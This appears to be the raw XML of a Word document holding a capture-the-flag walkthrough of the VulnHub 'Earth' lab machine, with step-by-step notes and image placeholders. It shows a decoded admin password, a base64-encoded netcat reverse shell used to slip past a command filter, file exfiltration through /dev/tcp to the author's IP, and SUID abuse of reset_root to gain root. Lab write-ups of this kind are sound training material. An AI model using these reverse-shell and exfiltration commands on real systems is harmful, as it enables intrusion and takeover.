                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>used  by</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t xml:space="preserve"> testdata.txt</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00097683" w:rsidRPr="000D6186" w:rsidRDefault="00097683" w:rsidP="00240D98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i/>
                <w:iCs/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>fouth:-</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r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  <w:r w:rsidRPr="000D6186">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>the username of admin panel is terra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 now I’ll look key (testdata.txt) for next clue</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00FD5C7E" w:rsidRDefault="00FD5C7E" w:rsidP="00240D98">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00097683" w:rsidRDefault="00097683" w:rsidP="00240D98">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:noProof/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="34ED2F6B" wp14:editId="0A40DFE9">
                  <wp:extent cx="5731510" cy="866140"/>
                  <wp:effectExtent l="0" t="0" r="2540" b="0"/>
                  <wp:docPr id="82303454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3034542" name="Picture 82303454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6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D6186">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t xml:space="preserve">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It’s just a normal message in this directory so now I copy this message and paste cyberchef to decrypt the </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>message  use</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t xml:space="preserve"> in earth main page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5DA9E6B" wp14:editId="5EFC7896">
                  <wp:extent cx="5731510" cy="2033905"/>
                  <wp:effectExtent l="0" t="0" r="2540" b="4445"/>
                  <wp:docPr id="144071172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711720" name="Picture 144071172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using one-by-one all encrypted message I get this result the result is </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t xml:space="preserve">“earthclimatechangebad4human”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 think it’s a password of admin panel pag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 4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, Now I can access the admin pag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6AB0D4D" wp14:editId="3B2A11A6">
                  <wp:extent cx="5731510" cy="1247140"/>
                  <wp:effectExtent l="0" t="0" r="2540" b="0"/>
                  <wp:docPr id="27100028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00283" name="Picture 27100028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</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>yes</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t xml:space="preserve"> I can access with right username and password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Username:-</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t xml:space="preserve"> terra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Password:-</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t xml:space="preserve"> earthclimatechangebad4human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t’s </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>a</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t xml:space="preserve"> a</w:t>
            </w:r>
            <w:r w:rsidR="00FD5C7E">
              <w:rPr>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>d</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t xml:space="preserve">min command tool what I write its shows m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7F3DC81" wp14:editId="415F1A7A">
                  <wp:extent cx="4587240" cy="989006"/>
                  <wp:effectExtent l="0" t="0" r="3810" b="1905"/>
                  <wp:docPr id="50994816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9948164" name="Picture 50994816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876" cy="995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writing whoami so server show me the result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so now I try to take reverse connection in my terminal for graining user/root access easier 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 use nc for reverse connection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8879D73" wp14:editId="05B02A89">
                  <wp:extent cx="3154680" cy="1038891"/>
                  <wp:effectExtent l="0" t="0" r="7620" b="8890"/>
                  <wp:docPr id="29163258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632583" name="Picture 291632583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324" cy="104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25C70A8" wp14:editId="3F5AC149">
                  <wp:extent cx="5731510" cy="1246505"/>
                  <wp:effectExtent l="0" t="0" r="2540" b="0"/>
                  <wp:docPr id="126930511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305114" name="Picture 1269305114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ver shows me ‘remote connections are forbidden!!’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 encrypt the payload and put in CLI cmd again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FD5C7E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w</w:t>
            </w:r>
            <w:r w:rsidR="00097683">
              <w:rPr>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t xml:space="preserve"> I come in my linux terminal I us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ho “nc -e /bin/bash192.168.1.108 4444’ | base64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7B5E8B6" wp14:editId="38AD43C4">
                  <wp:extent cx="5731510" cy="959485"/>
                  <wp:effectExtent l="0" t="0" r="2540" b="0"/>
                  <wp:docPr id="42148318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1483185" name="Picture 42148318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59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this I put this payload in CLI cmd and run again </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>lets</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t xml:space="preserve"> see which type result I get now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6A0D9223" wp14:editId="25AC440C">
                  <wp:extent cx="5731510" cy="1397635"/>
                  <wp:effectExtent l="0" t="0" r="2540" b="0"/>
                  <wp:docPr id="500596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05963" name="Picture 5005963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n this I us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cho ‘encrypted_stringvalue’ |base64 -d | bash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ep5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is time I get different result I get successfully reverse connection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CBB5973" wp14:editId="1A63697F">
                  <wp:extent cx="5731510" cy="1688465"/>
                  <wp:effectExtent l="0" t="0" r="2540" b="6985"/>
                  <wp:docPr id="920196757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196757" name="Picture 920196757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8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this I use python for better to access terminal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find user/root flag in earth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72D2E302" wp14:editId="1F5BB492">
                  <wp:extent cx="5731510" cy="2724785"/>
                  <wp:effectExtent l="0" t="0" r="2540" b="0"/>
                  <wp:docPr id="803803603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3803603" name="Picture 803803603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here the first user flag, after doing more research I didn’t more user flag so it means only root flag left now so now I </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>want  to</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t xml:space="preserve"> find root user and then it’s over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1C2B0DCC" wp14:editId="3ABD0CE6">
                  <wp:extent cx="3703320" cy="2588139"/>
                  <wp:effectExtent l="0" t="0" r="0" b="3175"/>
                  <wp:docPr id="36826902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269028" name="Picture 36826902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748" cy="259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So</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t xml:space="preserve"> I use ‘find / -perm -u=s -type f 2&gt;/dev/null</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00097683" w:rsidRPr="00AA3158" w:rsidRDefault="00097683" w:rsidP="00240D98">
            <w:p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 xml:space="preserve">The command </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00AA3158">
              <w:rPr>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>find</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00AA3158">
              <w:rPr>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t xml:space="preserve"> / -perm -u=s -type f 2&gt;/dev/null is used in Linux/Unix systems to search for files that have the </w:t>
            </w:r>
            <w:r w:rsidRPr="00AA3158">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>setuid</w:t>
            </w:r>
            <w:r w:rsidRPr="00AA3158">
              <w:rPr>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t xml:space="preserve"> permission set. Here's a breakdown of the components of the command:</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00097683" w:rsidRPr="00AA3158" w:rsidRDefault="00097683" w:rsidP="00240D98">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0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lastRenderedPageBreak/>
              <w:t>find: This is the command used to search for files in a directory hierarchy.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00097683" w:rsidRPr="00AA3158" w:rsidRDefault="00097683" w:rsidP="00240D98">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0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>/: This tells find to start the search from the root directory /, i.e., the entire file system.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00097683" w:rsidRPr="00AA3158" w:rsidRDefault="00097683" w:rsidP="00240D98">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0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 xml:space="preserve">-perm -u=s: This option looks for files that have the </w:t>
            </w:r>
            <w:r w:rsidRPr="00AA3158">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>setuid</w:t>
            </w:r>
            <w:r w:rsidRPr="00AA3158">
              <w:rPr>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t xml:space="preserve"> permission set for the user (owner).</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00097683" w:rsidRPr="00AA3158" w:rsidRDefault="00097683" w:rsidP="00240D98">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="1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>u=s means that the file's user (owner) permissions are exactly set to s, where s stands for the setuid bit.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00097683" w:rsidRPr="00AA3158" w:rsidRDefault="00097683" w:rsidP="00240D98">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="1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 xml:space="preserve">The </w:t>
            </w:r>
            <w:r w:rsidRPr="00AA3158">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>setuid</w:t>
            </w:r>
            <w:r w:rsidRPr="00AA3158">
              <w:rPr>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t xml:space="preserve"> bit allows a file to be executed with the privileges of its owner, rather than the user executing it.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00097683" w:rsidRPr="00AA3158" w:rsidRDefault="00097683" w:rsidP="00240D98">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0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>-type f: This restricts the search to regular files only (excluding directories, symlinks, etc.).</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00097683" w:rsidRPr="00AA3158" w:rsidRDefault="00097683" w:rsidP="00240D98">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:numPr>
              <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
              <w:rPr>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AA3158">
              <w:rPr>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>2&gt;/dev/null: This part redirects any error messages (such as "Permission Denied" errors) to /dev/null, effectively silencing them so they don't appear in the output.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 get the file name “usr/bin/reset_root” so now it’s time take over root user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1A49978" wp14:editId="22A02FC4">
                  <wp:extent cx="5731510" cy="794385"/>
                  <wp:effectExtent l="0" t="0" r="2540" b="5715"/>
                  <wp:docPr id="14924025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4025" name="Picture 14924025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94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FD5C7E" w:rsidRDefault="00FD5C7E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>Step 6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use file /usr/bin/reset_root to triggering rest root but its </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>fail</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t xml:space="preserve"> so now I bring reset_root file in my terminal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modifying and resend to earth machin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open my listening port for sending reset_root to our terminal after that I send reset_root file to my terminal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6553B42" wp14:editId="3ECF3C24">
                  <wp:extent cx="5144218" cy="1133633"/>
                  <wp:effectExtent l="0" t="0" r="0" b="9525"/>
                  <wp:docPr id="1217378870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78870" name="Picture 1217378870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4218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Now I transfer that file to our terminal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2F42F530" wp14:editId="36C5108C">
                  <wp:extent cx="5731510" cy="1256030"/>
                  <wp:effectExtent l="0" t="0" r="2540" b="1270"/>
                  <wp:docPr id="21261916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619161" name="Picture 21261916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I successfully send that file to my terminal so now I can modify and send to earth machine and then I gain root access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or file tranfer I use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 /usr/bin/reset_root(filename) &gt; /dev/tcp/192.168.1.108(my IP)/4444(port no)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118AA18" wp14:editId="6A422F63">
                  <wp:extent cx="5731510" cy="880110"/>
                  <wp:effectExtent l="0" t="0" r="2540" b="0"/>
                  <wp:docPr id="22516952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169523" name="Picture 225169523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88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File transfer done successfully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 now I back to our terminal and make some changes in reset_root file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0820CC8C" wp14:editId="6D53D9B1">
                  <wp:extent cx="5731510" cy="553720"/>
                  <wp:effectExtent l="0" t="0" r="2540" b="0"/>
                  <wp:docPr id="28441519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415192" name="Picture 284415192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5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proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>First</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t xml:space="preserve"> I use chmod for make this file executable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nd after that I use ltrace cmd </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00097683" w:rsidRPr="00D7290B" w:rsidRDefault="00097683" w:rsidP="00240D98">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/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D7290B">
              <w:rPr>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t xml:space="preserve">The ltrace command is used to trace library function calls made by a program. It shows calls to shared libraries and the arguments passed to those functions. It’s a helpful tool for debugging and understanding how a program interacts with dynamic libraries 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44D35C67" wp14:editId="7B8CB40E">
                  <wp:extent cx="5731510" cy="1822450"/>
                  <wp:effectExtent l="0" t="0" r="2540" b="6350"/>
                  <wp:docPr id="18878806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80618" name="Picture 1887880618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So now it’s almost done now I make a new directory in earth server and put </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>this files</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t xml:space="preserve"> and make it executable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5FE478B7" wp14:editId="5AF7F998">
                  <wp:extent cx="5731510" cy="1967230"/>
                  <wp:effectExtent l="0" t="0" r="2540" b="0"/>
                  <wp:docPr id="128394485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3944858" name="Picture 1283944858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96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Like this and </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>its</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t xml:space="preserve"> done now I get root password “Earth” so now I can become root user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762F1262" wp14:editId="06E13576">
                  <wp:extent cx="5731510" cy="2247900"/>
                  <wp:effectExtent l="0" t="0" r="2540" b="0"/>
                  <wp:docPr id="115556086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5560869" name="Picture 1155560869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fter using “su root” and use password “Earth” now I become root user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One last step to prove myself I become root so now I find root flag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o first I go to root directory and find final flag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lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="08CCAD16" wp14:editId="2F18E7D4">
                  <wp:extent cx="5731510" cy="4959350"/>
                  <wp:effectExtent l="0" t="0" r="2540" b="0"/>
                  <wp:docPr id="103261083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610832" name="Picture 1032610832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95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40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t xml:space="preserve">   </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00FD5C7E" w:rsidRDefault="00FD5C7E" w:rsidP="00240D98">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
            </w:pP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doing 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d root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Ls</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00097683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t root_flag.txt</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00097683" w:rsidRPr="000D6186" w:rsidRDefault="00097683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After getting the final </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>flag(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>root flag) complete this machine</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00977A3D" w:rsidRPr="00097683" w:rsidRDefault="00977A3D" w:rsidP="00240D98">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00977A3D" w:rsidTr="00240D98">
        <w:trPr>
          <w:trHeight w:val="699"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2278" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00977A3D" w:rsidRPr="00977A3D" w:rsidRDefault="00977A3D" w:rsidP="00240D98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References </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9246" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00977A3D" w:rsidRPr="002E42AE" w:rsidRDefault="002E42AE" w:rsidP="00240D98">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002E42AE">
              <w:rPr>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>https://medium.com/@galihabraa/solving-the-planets-earth-vm-from-vulnhub-walkthrough-writeup-29f356d489fb</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00977A3D" w:rsidRPr="0006168E" w:rsidRDefault="00977A3D" w:rsidP="0006168E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00977A3D" w:rsidRPr="0006168E" w:rsidRDefault="00665E9C" w:rsidP="0006168E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lastRenderedPageBreak/>
        <w:t>Csv:-</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00240D98">
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId40" w:history="1">
        <w:r w:rsidR="00792846" w:rsidRPr="00792846">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="40"/>
            <w:szCs w:val="40"/>
          </w:rPr>
          <w:t>..\earth.csv</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00977A3D" w:rsidRDefault="00977A3D"/>
    <w:p w:rsidR="00977A3D" w:rsidRDefault="00977A3D"/>
    <w:p w:rsidR="00977A3D" w:rsidRDefault="00977A3D"/>
    <w:sectPr w:rsidR="00977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73C42"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F182A0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2577A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7D06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76FD8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="39D64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62F60"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4CC21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90F56"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2C44B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A5C9B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C6C0469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4484B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2D907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4B7A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B2004E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E5ABD"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7958A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313AA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="07AE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3585D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4186197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16BAD"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="DE84FE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6426B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9328F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11A8F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="09381A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757C5"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F59603A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40F8D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B3683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63CD0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="855C828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0452B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="67AA65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9698F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="DE24C1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772AC"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1520D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54944"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2E664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14644">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1385177490">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="134808854">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="739711563">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1560825053">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="536235789">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="188882839">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="530187360">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="542595126">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="1086267345">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="1919241075">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="863445674">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="836699771">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="1127166925">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="1541554680">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="16" w16cid:durableId="1844779476">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="17" w16cid:durableId="856313622">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="18" w16cid:durableId="973950841">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="19" w16cid:durableId="827594337">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="20" w16cid:durableId="32314798">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="21" w16cid:durableId="7424587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A3D"/>
    <w:rsid w:val="00014A92"/>
    <w:rsid w:val="0006168E"/>
    <w:rsid w:val="00091E08"/>
    <w:rsid w:val="00097683"/>
    <w:rsid w:val="000C6BC5"/>
    <w:rsid w:val="000D6186"/>
    <w:rsid w:val="00110404"/>
    <w:rsid w:val="0015296C"/>
    <w:rsid w:val="001557FE"/>
    <w:rsid w:val="00181577"/>
    <w:rsid w:val="001B0294"/>
    <w:rsid w:val="00240D98"/>
    <w:rsid w:val="002E42AE"/>
    <w:rsid w:val="002E5E85"/>
    <w:rsid w:val="00304280"/>
    <w:rsid w:val="00310988"/>
    <w:rsid w:val="00354E94"/>
    <w:rsid w:val="003C7A3C"/>
    <w:rsid w:val="0040179C"/>
    <w:rsid w:val="005016CA"/>
    <w:rsid w:val="005A5BA8"/>
    <w:rsid w:val="00665E9C"/>
    <w:rsid w:val="006805B0"/>
    <w:rsid w:val="006F6CC4"/>
    <w:rsid w:val="006F7613"/>
    <w:rsid w:val="00792846"/>
    <w:rsid w:val="007D525D"/>
    <w:rsid w:val="00816CFE"/>
    <w:rsid w:val="00922753"/>
    <w:rsid w:val="00977A3D"/>
    <w:rsid w:val="00997CCB"/>
    <w:rsid w:val="009D5E66"/>
    <w:rsid w:val="00A073BA"/>
    <w:rsid w:val="00A779AF"/>
    <w:rsid w:val="00AA3158"/>
    <w:rsid w:val="00BE463B"/>
    <w:rsid w:val="00BF375B"/>
    <w:rsid w:val="00C26CDE"/>
    <w:rsid w:val="00CA569D"/>
    <w:rsid w:val="00D7290B"/>
    <w:rsid w:val="00E51B2E"/>
    <w:rsid w:val="00E83024"/>
    <w:rsid w:val="00FD5C7E"/>
    <w:rsid w:val="00FF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1877"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{5EAE61ED-0A76-4852-863E-902CB34A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A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A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A3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A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3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7A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7A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7A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7A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A3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A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A3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A3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3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7A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7A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7A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7A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7A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A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7A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7A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7A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7A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7A3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7A3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7A3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7A3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77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4A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94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../earth.cs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s://terratest.earth.local/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8755-2B95-4038-B019-2C514A55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0</Pages>
  <Words>1351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ingh</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>ayush singh</cp:lastModifiedBy>
  <cp:revision>9</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-04-07T15:39:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-07-15T19:06:00Z</dcterms:modified>
</cp:coreProperties>
</file>